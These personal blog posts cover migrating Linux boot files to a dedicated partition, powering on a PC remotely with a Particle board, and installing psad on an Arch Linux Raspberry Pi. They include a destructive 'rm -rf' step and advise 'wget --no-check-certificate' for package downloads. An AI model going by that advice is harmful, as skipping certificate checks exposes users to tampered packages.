So what went wrong? Basically, the problem is with the partitions on the server's hard drives. When Grub tries to load the initrd file into memory, it reaches the end of what it can read from the hard drive before reaching the end of the file. In our case, the RAID controller makes the hard drives appear as a single 4TB drive. This is quite large and the initrd file could reside anywhere in those 4TB. As it turns out, Grub could not address the disk location of our initrd file and therefore couldn't load it. So the power outage was not the direct cause of our problem. At some point, most likely during an Ubuntu update, the initrd file was rewritten and ended up in a location on the logical hard drive which Grub can't reach.
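
The exact limit on this server was never pinned down, but a back-of-the-envelope calculation shows how such a limit can arise. The Python sketch below assumes, purely for illustration, that the firmware's disk interface only handles 32-bit sector numbers with 512-byte sectors, a common constraint with BIOS booting; the names and the 30MB file size are made up.

```python
SECTOR_SIZE = 512   # bytes per sector (assumed)
ADDRESS_BITS = 32   # assumed width of the sector number the firmware accepts

TIB = 1024 ** 4


def max_addressable_bytes(bits=ADDRESS_BITS, sector_size=SECTOR_SIZE):
    """Highest byte offset reachable with `bits`-wide sector numbers."""
    return (2 ** bits) * sector_size


def is_reachable(offset, length):
    """True if the whole file [offset, offset + length) lies below the limit."""
    return offset + length <= max_addressable_bytes()


print(max_addressable_bytes() / TIB)  # 2.0

initrd_size = 30 * 1024 ** 2                  # hypothetical 30MB initrd
print(is_reachable(100 * 1024 ** 2, initrd_size))  # True: near the disk start
print(is_reachable(3 * 10 ** 12, initrd_size))     # False: 3TB into the volume
```

Under that assumption, roughly half of a 4TB volume is out of reach, and a file that used to sit in the lower half can become unreadable to the bootloader simply by being rewritten further out.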

The solution to this problem is to keep the boot files in a small partition which resides at the start of the hard drive. For those readers who skipped straight to this section, that's all you need to know. When you install a Linux system, you really should make a dedicated 256MB partition for holding the boot files, despite the fact that most Linux installers do not require you to do this.

In my case, however, I couldn't just reinstall the operating system, so in the following paragraphs I'll describe how I migrated the boot files in my already existing Linux installation into a new dedicated boot partition.

Creating a Boot Partition in an Existing Linux Installation

I started by flashing a copy of Ubuntu to a flash drive and booting it. There are plenty of tutorials on the internet about how to boot Ubuntu from a flash drive, so I'll forgo those instructions here.

The first thing I did was use gparted to create a new partition which will serve as our dedicated boot partition. Since the hard drive is already formatted, doing this requires shrinking the main partition and shifting it 256MB over. This frees up space at the start of the hard drive which can then be formatted into the new dedicated boot partition. If you've never used gparted before, I recommend using the GUI version since it's pretty intuitive. The new partition can be formatted to "ext4" and needs to have the "boot" flag enabled. Completing the shift will take a while, so you'll probably want to do this overnight.

Once the new partition has been created, we next need to copy the existing "/boot" directory's contents over to the new partition. This can be done by mounting the two partitions while still in the Ubuntu Live USB. In the following commands, sda2 is my main partition and sda4 is the new boot partition:

sudo -s
mkdir /mnt/sda2
mkdir /mnt/sda4
mount /dev/sda2 /mnt/sda2
mount /dev/sda4 /mnt/sda4
cp -R /mnt/sda2/boot/* /mnt/sda4/
rm -rf /mnt/sda2/boot/
mkdir /mnt/sda2/boot
umount /mnt/sda2
umount /mnt/sda4

Finally, Linux and Grub need to be reconfigured so they know that the "/boot" directory is now in a separate partition. This can be done manually by modifying Grub's "grub.cfg" file and Linux's "/etc/fstab" file, but for simplicity, you can use Boot Repair. If you choose to go the Boot Repair route, make sure to switch the GUI into advanced mode and go through all the options. Specifically, you need to make sure the "boot partition" option is set to your new boot partition and the "main operating system" option is set to your main partition. Also, make sure the "set boot flag" option is pointed at your new boot partition. You can save a lot of time by disabling the "check filesystem for errors" option. If you instead decide to go the manual route, you'll need to edit "grub.cfg", looking for every "hd" reference and changing it to point at the correct partition. The fstab file will also need an additional entry to mount your new partition at "/boot" during start-up.
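
For the manual route, the extra fstab entry has six whitespace-separated fields: device, mount point, filesystem type, mount options, dump flag, and fsck order. The following Python sketch just assembles such a line; the helper name fstab_boot_entry is made up, and /dev/sda4 with ext4 is taken from the example above. Many setups identify the partition by UUID (as reported by blkid) instead of by device name, which is left out here.

```python
def fstab_boot_entry(device, fs_type="ext4"):
    """Build an /etc/fstab line that mounts `device` at /boot."""
    fields = [
        device,      # which partition to mount
        "/boot",     # where to mount it
        fs_type,     # filesystem the partition was formatted with
        "defaults",  # standard mount options
        "0",         # do not include in dump backups
        "2",         # fsck after the root filesystem (which uses 1)
    ]
    return "\t".join(fields)


print(fstab_boot_entry("/dev/sda4"))
```

The printed line is what would be appended to "/etc/fstab" on the main partition.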

If you do everything correctly, this should fix your Linux system and prevent similar issues from arising in the future.

Conclusion

Even though modern Linux installers do not require you to create a separate partition for the boot files, I recommend doing it anyway, especially if you have large hard drives. Otherwise, you might run into the problem I did.

Using internet of things to turn on a computer.

2015-09-18T11:16:00-04:00

Here's a fun and quick but practical hack using a small Particle board to turn on and off a computer from anywhere over the internet.

This project takes under an hour and is a good little assignment for anyone looking into learning some basic hardware hacking with useful applications.

The Scenario

I have a computer in my apartment which I mostly use for playing video games, but sometimes I like to access it remotely over the internet to do server tasks for me. The problem though is that gaming desktops use a lot of electricity when they're running. So running the computer 24/7 would be too wasteful.

Instead, I want to be able to turn on my computer from anywhere on the internet; whenever I desire to use it remotely.

This can be achieved using "wake-on-LAN" (WoL), but unfortunately my desktop's motherboard is too old to support this. So instead, I decided to connect a Particle Core to my desktop's motherboard so it can turn on the computer for me!

Particle

For this hack, I used a Particle Core because that's what I had lying around, but a Photon would work just as well and is only $19. For the sake of brevity, I'm going to skip the details of how to set up and configure your Particle device. If this is your first time using Particle, they have a tutorial here.

ATX Motherboards

My motherboard is an ATX, but the process should be similar for other common motherboard specifications.

So how does pushing the power button turn on your computer? Your motherboard has two pins on it which are used to turn on the computer:

One of the two pins (labeled Power Switch in the above diagram) holds a 3.3V to 5V charge and the other pin is ground. When you press the power button, the circuit is completed, allowing the charged pin to discharge into the ground pin. This drop in voltage is detected by the motherboard, which serves as the signal that it's time to power up.

For our project, we're going to do the same thing, only instead of using a button, we're going to use a Particle.

Wiring the Particle

The circuit is pretty simple and with the right supplies you won't even need to solder anything! Once you've identified which pins on your motherboard are for the power, you can use the simple diagram below to wire everything up. All we're going to do is run a wire from one of the digital pins on the Particle to one of the power pins and then another wire from the Particle's ground to the other pin. I also added a small 220 ohm resistor to the ground wire just to make sure the Particle doesn't get fried.

Software

One of the nice things about Particle's boards is that they all communicate with Particle's cloud. This allows us to write our code through Particle's web interface and then the cloud can remotely flash the Particle. No need to open the case!

The following is the source code for our Particle:

/**
 * Mobo Power - Copyright 2015 Carter Yagemann
 * 
 * This program allows a core to power on a motherboard over the internet!
 * 
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 */

void setup() {
    // D0 will control the motherboard
    pinMode(D0, OUTPUT);

    // ATX boards maintain high power on their power pin and then ground
    // shortly to signal that the motherboard should power up. So we
    // normally want the pin to be in the high state.
    digitalWrite(D0, HIGH);

    // Register a function with Particle's cloud service so we can invoke
    // the core from over the internet.
    Spark.function("poweron", powerOn);
}

void loop() {
    // Nothing to do
}

int powerOn(String command) {
    // Switch the pin to low for half a second so the motherboard knows
    // it's time to turn on.
    digitalWrite(D0, LOW);
    delay(500);
    digitalWrite(D0, HIGH);

    return 1;
}

Once we've flashed our Particle with this software, all that's left is to use it!

Pressing the button... from anywhere in the world

You can communicate with your Particle through their REST API. The simplest way to do this is with a curl command:

curl https://api.particle.io/v1/devices/device_id/poweron -d access_token=access_token

Where device_id is the ID for your Particle and the access_token is your account token.
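
The same request can be made from a script. The Python sketch below only builds the POST request using the standard library; the helper name build_power_on_request is made up, the device ID and token are placeholders, and the function name "poweron" is the one registered in the firmware above. Sending it is left as a commented-out line so nothing is contacted by accident.

```python
from urllib.parse import urlencode
from urllib.request import Request

API_ROOT = "https://api.particle.io/v1/devices"


def build_power_on_request(device_id, access_token, function_name="poweron"):
    """Build the POST request that invokes a cloud function on the device."""
    url = f"{API_ROOT}/{device_id}/{function_name}"
    body = urlencode({"access_token": access_token}).encode("ascii")
    return Request(url, data=body, method="POST")


request = build_power_on_request("device_id", "access_token")
print(request.get_method(), request.full_url)

# To actually press the button:
# from urllib.request import urlopen
# with urlopen(request) as response:
#     print(response.read().decode())
```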

And that's it! Hopefully you've found this tutorial to be useful. If you have any questions or comments, you can contact me via any of the means listed on my homepage.

Happy hacking!

Installing psad on Raspberry Pi Running Arch Linux

2015-02-13T11:00:00-05:00

I've been fooling around with IDS and specifically psad and I thought it would be fun to try installing psad on my raspberry pi. Little did I know, installing psad on an ARM processor running Arch Linux with systemd is not a simple process. It took me great effort to get psad running correctly, so I thought I'd take the time to document my struggles in the hopes that this will be useful to someone else.

What is psad?

psad is an intrusion detection system (IDS) which works by monitoring logs generated by iptables (a network firewall common to most Linux distros). You can find more information on psad here.

Scope of this document

The focus of this document is on challenges I ran into while trying to get psad to install and run on a raspberry pi and my solutions. This document does not cover how to configure or use psad. It does cover things which I had to take into consideration due to the raspberry pi CPU being an ARM processor and due to my OS being Arch Linux with systemd.

Contact

Many of my solutions are hacks and probably suboptimal hacks at that. If you see anything wrong with this guide or have better solutions to the problems I covered here, feel free to contact me at cmyagema@syr.edu.

Other Useful Resources

psad homepage
An installation guide that helped me (Edit: This blog no longer exists)
A guide on configuring psad

Installing psad for ARM from AUR

Since psad is not included in the main Arch Linux repositories, it has to be downloaded, compiled, and built from the AUR repository.

First, create a file (I will name it "list.txt") and write in it the following URLs:

https://aur.archlinux.org/packages/pe/perl-unix-syslog/perl-unix-syslog.tar.gz
https://aur.archlinux.org/packages/pe/perl-iptables-parse/perl-iptables-parse.tar.gz
https://aur.archlinux.org/packages/pe/perl-iptables-chainmgr/perl-iptables-chainmgr.tar.gz
https://aur.archlinux.org/packages/ps/psad/psad.tar.gz

These are the tarballs which we will need from AUR.

Next, run the following commands to untar the tarballs, build them, and install them:

cat list.txt | xargs wget
tar xzvf perl-iptables-parse.tar.gz
cd perl-iptables-parse
makepkg -Acs
sudo pacman -U perl-iptables-parse-1.1-2-any.pkg.tar.xz
cd ..
tar xzvf perl-unix-syslog.tar.gz
cd perl-unix-syslog
makepkg -Acs
sudo pacman -U perl-unix-syslog-1.1-4-any.pkg.tar.xz
cd ..
tar xzvf perl-iptables-chainmgr.tar.gz
cd perl-iptables-chainmgr
makepkg -Acs
sudo pacman -U perl-iptables-chainmgr-1.2-2-any.pkg.tar.xz
cd ..
tar xzvf psad.tar.gz
cd psad
makepkg -Acs
sudo pacman -U --force psad-2.2.3-1-armv6h.pkg.tar.xz
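
The commands above repeat the same steps for each package, so they can be folded into a loop. What follows is only a minimal sketch, not a tested replacement. It assumes each tarball unpacks into a directory named after the package and that makepkg leaves exactly one *.pkg.tar.xz file in that directory. The function names pkg_name_from_url and build_and_install are made up for illustration. It also leaves out the --force flag used for psad above, so add it by hand if pacman complains.

```shell
# Sketch: build and install every AUR tarball listed in list.txt.
# Assumptions (not from the original steps): each tarball unpacks into a
# directory named after the package, and makepkg produces a single
# *.pkg.tar.xz file there.

# Print the package name for a tarball URL, e.g. ".../psad.tar.gz" -> "psad".
pkg_name_from_url() {
    basename "$1" .tar.gz
}

# Download, unpack, build, and install one package given its URL.
build_and_install() {
    pkg=$(pkg_name_from_url "$1") || return 1
    wget "$1" &&
    tar xzvf "$pkg.tar.gz" &&
    ( cd "$pkg" && makepkg -Acs && sudo pacman -U ./*.pkg.tar.xz )
}

# Usage (list.txt already lists the Perl modules before psad):
#   for url in $(cat list.txt); do build_and_install "$url" || break; done
```

The loop stops at the first failure so that psad is never built against a missing Perl dependency.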

Now if you are lucky, unlike me, this should be all you have to do. However, I ran into several additional problems, which are covered in the Troubleshooting section below.

Configuration

As I mentioned earlier, I am not going to cover how to configure psad. There is, however, one setting which I will mention because it's different from other systems. Namely, the syslog file is in an unusual location because of how systemd logs.

To fix this setting, list the contents of your /var/log/journal/ directory. You should see a directory containing a bunch of letters and numbers and inside that directory should be a file called system.journal. I found that this is the file which psad has to be pointed to.

Once you have identified this path, open /etc/psad/psad.conf and point IPT_SYSLOG_FILE to this file. In my case, this means:

IPT_SYSLOG_FILE /var/log/journal/37ed4fd73b0c416886710f1c8ffa083b/system.journal;
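
Finding the path by hand is easy enough, but the lookup can also be scripted. This is a minimal sketch, assuming the journal sits exactly one directory below /var/log/journal/ as described above. The helper name journal_conf_line is hypothetical. It only prints the line; you still have to put it in /etc/psad/psad.conf yourself.

```shell
# Sketch: locate system.journal and print a matching psad.conf line.
# journal_conf_line is a hypothetical helper; the default root is the
# /var/log/journal directory described in the text.
journal_conf_line() {
    root="${1:-/var/log/journal}"
    # Use the first system.journal found one level below the root.
    for f in "$root"/*/system.journal; do
        if [ -f "$f" ]; then
            printf 'IPT_SYSLOG_FILE %s;\n' "$f"
            return 0
        fi
    done
    echo "no system.journal found under $root" >&2
    return 1
}

# Usage:
#   journal_conf_line                 # look under /var/log/journal
#   journal_conf_line /some/other/dir # look under a different root
```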

If you want to try port scanning yourself, or test your psad installation in general, be mindful that the Raspberry Pi has very limited computing resources, so it might take a while for your test to show up in psad's status.

Troubleshooting

wget fails due to certificates

This one is easy: replace cat list.txt | xargs wget with cat list.txt | xargs wget --no-check-certificate. Keep in mind that this makes wget skip certificate verification.

makepkg fails and returns a build error

Try rebooting the Raspberry Pi and running the build again. Sometimes not having enough free memory can cause the build to fail.

psad is installed, but when I run `sudo psad -S` I get the message `pid file [...]/psadwatchd.pid does not exist`

If you're seeing this towards the top of the output for sudo psad -S:

[-] psad: pid file /var/run/psad/psadwatchd.pid does not exist for psadwatchd on HOSTNAME

Then you probably have the same problem I had.

This was the most painful of the problems I ran into, and it was the one big enough to convince me to write this document. If I hadn't run into this issue (and the systemd logging issue), I wouldn't have bothered writing any of this. The problem in my case was that "psadwatchd" wasn't starting for some reason when "psad" started. To confirm this as the source of the problem, run:

ps -A | grep "psad"

If you only see one process called "psad" and no "psadwatchd", then you're having the same problem as me.

The solution I came up with for this is very much a hack, but it works decently. Basically, I got around this by making a separate service for psadwatchd.

First, create a new file: /etc/systemd/system/psadwatchd.service

In this file, write:

[Unit]
Description=Port scan attack detector daemon
After=psad.service
[Service]
ExecStart=/usr/sbin/psadwatchd
Type=oneshot
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target

Next, confirm that you wrote this service file correctly by starting it in systemctl:

sudo systemctl start psadwatchd

If all went as it should, you should be able to execute the following two commands:

ps -A | grep "psad"
sudo psad -S

The first command should return both a psad process and a psadwatchd process. The second command should now show information on psadwatchd and no longer show an error about missing PID files.
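
If you would rather not eyeball the ps output, the first check can be scripted. This is a minimal sketch, assuming the processes show up under exactly the names psad and psadwatchd, as they did for me. The helper name check_psad_procs is hypothetical, and it reads process names from stdin so that it does not depend on any particular ps output format.

```shell
# Sketch: succeed only if both psad and psadwatchd appear in a list of
# process names read from stdin (one name per line).
check_psad_procs() {
    names=$(cat)
    status=0
    for want in psad psadwatchd; do
        # -x matches the whole line, so "psad" does not match "psadwatchd".
        if printf '%s\n' "$names" | grep -qx "$want"; then
            echo "$want: running"
        else
            echo "$want: NOT running"
            status=1
        fi
    done
    return "$status"
}

# Usage:
#   ps -A -o comm= | check_psad_procs
```

The function returns a non-zero status when either process is missing, so it can be used in other scripts.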

Now that you've made a working psadwatchd service file, add this new service to systemd's startup list:

sudo systemctl enable psadwatchd

And that should be it (hopefully).
